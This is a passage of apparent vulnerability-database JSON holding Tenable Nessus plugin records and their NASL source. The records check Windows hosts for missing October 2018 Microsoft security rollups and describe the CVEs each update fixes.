exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462937');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"15063\",\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462937])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462941\nor cumulative update 4462926. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462926.NASL", "href": "https://www.tenable.com/plugins/nessus/118002", "published": "2018-10-09T00:00:00", "title": "KB4462941: Windows 8.1 and Windows Server 2012 R2 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118002);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8491\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\"\n );\n script_bugtraq_id(105477);\n script_xref(name:\"MSKB\", value:\"4462926\");\n script_xref(name:\"MSKB\", value:\"4462941\");\n script_xref(name:\"MSFT\", value:\"MS18-4462926\");\n script_xref(name:\"MSFT\", value:\"MS18-4462941\");\n\n script_name(english:\"KB4462941: Windows 8.1 and Windows Server 2012 R2 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462941\nor cumulative update 4462926. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\");\n # https://support.microsoft.com/en-us/help/4462926/windows-8-update-kb4462926\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?554e569a\");\n # https://support.microsoft.com/en-us/help/4462941/windows-8-update-kb4462941\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9d16a66a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4462941 or Cumulative Update KB4462926.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS18-10\";\nkbs = make_list('4462926', '4462941');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\n# Windows 8 EOL\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"6.3\",\n sp:0,\n rollup_date:\"10_2018\",\n bulletin:bulletin,\n rollup_kb_list:[4462926, 4462941])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-11-03T12:16:31", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4462919.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An Elevation of Privilege vulnerability exists in\n Windows Subsystem for Linux when it fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could execute arbitrary\n code and take control of an affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8329)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)", "modified": "2019-11-02T00:00:00", "id": "SMB_NT_MS18_OCT_4462919.NASL", "href": "https://www.tenable.com/plugins/nessus/117999", "published": "2018-10-09T00:00:00", "title": "KB4462919: Windows 10 Version 1803 and Windows Server Version 1803 October 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117999);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\n \"CVE-2018-8320\",\n \"CVE-2018-8329\",\n \"CVE-2018-8330\",\n \"CVE-2018-8333\",\n \"CVE-2018-8411\",\n \"CVE-2018-8413\",\n \"CVE-2018-8423\",\n \"CVE-2018-8453\",\n \"CVE-2018-8460\",\n \"CVE-2018-8472\",\n \"CVE-2018-8481\",\n \"CVE-2018-8482\",\n \"CVE-2018-8484\",\n \"CVE-2018-8486\",\n \"CVE-2018-8489\",\n \"CVE-2018-8491\",\n \"CVE-2018-8492\",\n \"CVE-2018-8493\",\n \"CVE-2018-8494\",\n \"CVE-2018-8495\",\n \"CVE-2018-8497\",\n \"CVE-2018-8503\",\n \"CVE-2018-8505\",\n \"CVE-2018-8506\",\n \"CVE-2018-8509\",\n \"CVE-2018-8530\"\n );\n script_bugtraq_id(105477, 105478);\n script_xref(name:\"MSKB\", value:\"4462919\");\n script_xref(name:\"MSFT\", value:\"MS18-4462919\");\n\n script_name(english:\"KB4462919: Windows 10 Version 1803 and Windows Server Version 1803 October 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4462919.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A security feature bypass vulnerability exists in DNS\n Global Blocklist feature. An attacker who successfully\n exploited this vulnerability could redirect traffic to\n malicious DNS endpoints. The update addresses the\n vulnerability by updating DNS Server Role record\n additions to not bypass the Global Query Blocklist.\n (CVE-2018-8320)\n\n - An information disclosure vulnerability exists when the\n Windows TCP/IP stack improperly handles fragmented IP\n packets. An attacker who successfully exploited this\n vulnerability could obtain information to further\n compromise the users system. (CVE-2018-8493)\n\n - A security feature bypass vulnerability exists when\n Microsoft Edge improperly handles requests of different\n origins. The vulnerability allows Microsoft Edge to\n bypass Same-Origin Policy (SOP) restrictions, and to\n allow requests that should otherwise be ignored. An\n attacker who successfully exploited the vulnerability\n could force the browser to send data that would\n otherwise be restricted. (CVE-2018-8530)\n\n - An elevation of privilege vulnerability exists when NTFS\n improperly checks access. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8411)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8492)\n\n - An elevation of privilege vulnerability exists when the\n DirectX Graphics Kernel (DXGKRNL) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2018-8484)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could execute code with elevated permissions.\n (CVE-2018-8497)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2018-8472)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8509)\n\n - A remote code execution vulnerability exists when\n "Windows Theme API" does not properly\n decompress files. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n Users whose accounts are configured to have fewer user\n rights on the system could be less impacted than users\n who operate with administrative user rights.\n (CVE-2018-8413)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2018-8453)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8503, CVE-2018-8505)\n\n - A remote code execution vulnerability exists in the\n Microsoft JET Database Engine. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2018-8423)\n\n - An Information Disclosure vulnerability exists in the\n way that Microsoft Windows Codecs Library handles\n objects in memory. An attacker who successfully\n exploited this vulnerability could obtain information to\n further compromise the users system. Exploitation of the\n vulnerability requires that a program process a\n specially crafted image file. The update addresses the\n vulnerability by correcting how Microsoft Windows Codecs\n Library handles objects in memory. (CVE-2018-8506)\n\n - An information disclosure vulnerability exists when\n Windows Media Player improperly discloses file\n information. Successful exploitation of the\n vulnerability could allow an attacker to determine the\n presence of files on disk. (CVE-2018-8481,\n CVE-2018-8482)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8460,\n CVE-2018-8491)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2018-8330)\n\n - An information disclosure vulnerability exists when\n DirectX improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. An authenticated attacker could exploit this\n vulnerability by running a specially crafted\n application. The update addresses the vulnerability by\n correcting how DirectX handles objects in memory.\n (CVE-2018-8486)\n\n - A remote code execution vulnerability exists when\n Windows Hyper-V on a host server fails to properly\n validate input from an authenticated user on a guest\n operating system. (CVE-2018-8489)\n\n - An Elevation of Privilege vulnerability exists in Filter\n Manager when it improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could execute elevated code and take control of an\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2018-8333)\n\n - A remote code execution vulnerability exists when the\n Microsoft XML Core Services MSXML parser processes user\n input. An attacker who successfully exploited the\n vulnerability could run malicious code remotely to take\n control of the users system. (CVE-2018-8494)\n\n - An Elevation of Privilege vulnerability exists in\n Windows Subsystem for Linux when it fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could execute arbitrary\n code and take control of an affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2018-8329)\n\n - A remote code execution vulnerability exists when\n Windows Shell improperly handles URIs. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8495)\");\n # https://support.microsoft.com/en-us/help/4462919/windows-10-update-kb4462919\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?ced2e3a3\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4462919.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8494\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Windows NtUserSetWindowFNID Win32k User Callback');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or 